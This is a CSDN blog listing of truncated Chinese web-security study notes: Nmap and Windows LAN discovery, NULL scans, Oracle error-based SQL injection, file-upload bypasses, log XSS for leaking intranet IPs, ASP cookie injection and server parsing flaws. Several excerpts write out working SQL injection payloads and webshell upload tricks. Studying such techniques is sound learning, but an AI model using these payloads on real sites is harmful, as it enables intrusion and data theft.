![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
снυαιαм ιее
这个作者很懒,什么都没留下…
展开
-
【读书笔记】蓝队——windows系统篇小白注释
探测局域网内主机net view /allnet vew \\ip如果遇到 发生系统错误 6118,此工作组的服务器列表当前无法使用说明是因为防火墙拦截ping探测for /L(代表循环) %i(变量) in (1,1,254) do ping -w(等待回复的超时时间)30 -n(要发送的回显请求数) 192.168.0.%i | find "回复" >> sb.txt开启Dhcp服务器日志reg add HKLM\System\CurrentContr..转载 2021-08-30 16:38:43 · 218 阅读 · 0 评论 -
【读书笔记】Nmap一些常用功能复习+详细解读报错
主机发现nmap -sn -PE-sn:NULL扫描,我的博客写过,请翻查-PE:全名icmp—echo——request(求报文请求),通常用于ping,我们发送一个icmp报文过去,其实就是求报文请求,如果对方存活,则应该回复一个icmp——echo——reply报文服务版本扫描nmap -sV-sV 端口版本扫描,例如对方把22端口改成了2222,我们就只知道对方开放了2222端口,而不知道端口运行了什么服务端口扫描nmap -sT -sU -p T:80,443,U.原创 2021-08-29 20:53:52 · 314 阅读 · 0 评论 -
【学习笔记】NULL扫描
什么是NULL扫描null其实指的是标志位为空这个标志位是tcp数据包的一个类型,指的是rst类什么是RST它的功能在于A与B创建了TCP连接,然后其中一端突然异常了,给另一方发送RST包,断开TCP连接,因为能够中断正常的连接,所以也衍生出了RST攻击NULL扫描的功能主要是浅显的判断操作系统类型的,如果发送RST包,对方系统没有返回包,那就是linux系统,反之,要是返回了数据,则是windows系统。原理Linux系统遵循RFC标准,如果端口开放,你还发包给这个端口,则原创 2021-08-29 19:50:51 · 1519 阅读 · 0 评论 -
【学习笔记】Oracle报错注入
||utl_inaddr. get_host_nameid=1||utl_inaddr. get_host_name((select banner from v$version where rownum=1))爆数据库版本id=1||utl_inaddr. get_host_name((select owner from all_tables where rownum=1))爆库名id=1||utl_inaddr. get_host_name((select owner from all_tabl原创 2020-11-17 08:11:41 · 220 阅读 · 0 评论 -
【学习笔记】Mysql bigint溢出漏洞
针对的版本为mysql 5.5.5及以上bigint长度为八字节,也就是六十四比特,这类数据类型有最大的符号值用二进制,十六进制,十进制分别表示为“0b0111111111111111111111111111111111111111111111111111111111111111”、“0x7fffffffffffffff”和“9223372036854775807”mysql> select 9223372036854775807+1;ERROR 1690 (22003): BIGINT v原创 2020-11-16 19:43:20 · 593 阅读 · 0 评论 -
【学习笔记】文件上传绕过
一般防御:JavaScript(直接禁用就好)content-type: image/gif (抓包改包)文件内容头(GIF89a)利用copy命令把图片和木马结合 木马头加上内容头就可以了后缀名黑白名单(大小写绕过,能被解析的扩展名列表jsp jspx jspfasp asa cer aspxphp php php3 php4exe exee,)配合文件包含漏洞(先上传一个包含恶意php代码的图片或者txt,有些waf只会对动态语言的页面进行验证)文件名解析漏洞(test.asp. tes原创 2020-11-16 18:30:49 · 371 阅读 · 0 评论 -
【学习笔记】日志xss打内网,nginx&apache结合的bug
apache和nginx的日志不美观,很难看,所以一些管理员会对其进行排版并输出成html的格式这时我们在消息头的ua部分进行xss提交即可获取内网IP的js代码(使用WebRTC,因为浏览器限制,想获取真实的外网IP,除chrome、Firefox之外都不行)。如果想获取外网IP,把第12行,改为servers ={iceServers:[{urls:“stun:stun.services.mozilla.com”}]};就行了。在文章底部会给出代码,大伙可自行下载(打开控制台即可见到IP)。O原创 2020-11-12 09:46:59 · 299 阅读 · 0 评论 -
【学习笔记】asp中的中转注入和消息头注入
中转注入原理我们都知道request. querystring是get,request. form是post。而一般人为了方便都是直接使用request("")的方式请求,没有明确用哪种请求方式,asp的解析顺序是先get后post然后cookie传输 ,这里的中转注入就是利用了cookie注入的方法怎么检测?例如网站xx. com/?id=1把id给去掉 就无法显示正常页面,因为没有传递参数。这时在ie浏览器中输入JavaScript:alert(document.cookie=“id=”+es原创 2020-11-12 08:02:15 · 235 阅读 · 1 评论 -
【学习笔记】解析漏洞大全
iis6baidu. com/xx.asp/xx.jpgbaidu. com/xx.asp;.jpg都会被解析为asp文件默认可执行文件除了asp 还有cer asa cdxapache他是从右到左解析的,遇到不能识别的后缀名会直接跳过,例如xx. php. fuck 会解析成php配置问题导致的解析:apache的conf里面add handler php5-script和addtype application/x-httpd-php 当遇到类似于xx. php. jsp时会自动解析成php原创 2020-11-09 09:34:44 · 282 阅读 · 0 评论